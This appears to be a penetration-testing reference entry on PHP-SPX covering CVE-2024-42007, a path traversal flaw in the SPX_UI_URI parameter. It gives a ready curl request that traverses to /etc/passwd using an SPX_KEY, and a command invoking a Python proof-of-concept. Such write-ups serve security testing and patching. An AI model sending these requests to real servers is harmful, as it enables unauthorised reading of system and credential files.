php-spx

PHP-SPX is a lightweight, open-source PHP profiling tool designed to help developers analyze and debug application performance. It integrates with PHP applications to collect detailed runtime metrics such as function call counts, execution times, and memory usage. PHP-SPX provides a web-based interface for visualizing this data, enabling easy identification of bottlenecks and optimization opportunities without significant overhead or complex setup.

Local File Inclusion

Based on the Journey to discovery and exploitation of path traversal in PHP-SPX (CVE-2024-42007) blog post by secatgourity.

PHP-SPX versions up to 0.4.15 are affected by a path traversal vulnerability (CVE-2024-42007) allowing unauthenticated attackers to read arbitrary files from the server. This issue arises from improper sanitization of the SPX_UI_URI parameter.

Exploitation requires crafting a specially formatted request to the vulnerable endpoint, leveraging the traversal flaw to specify the target file's path. Note that the SPX_KEY, a secret token used to authenticate requests to the profiler UI/API, will need to be inlcuded in the request (e.g. via phpinfo.php) as mentioned in the official documentation:

Just open with your browser the following URL: http://localhost/?SPX_KEY=dev&SPX_UI_URI=/ to access to the web UI control panel.

# Manual request
$ curl -s --path-as-is "http://spx/index.php/?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=/../../../../../../../etc/passwd"

A Python-based PoC exploit exists that demonstrates that automates the process, facilitating the extraction of sensitive information remotely.

python3 CVE_2024_42007.py -t http://spx -f /etc/passwd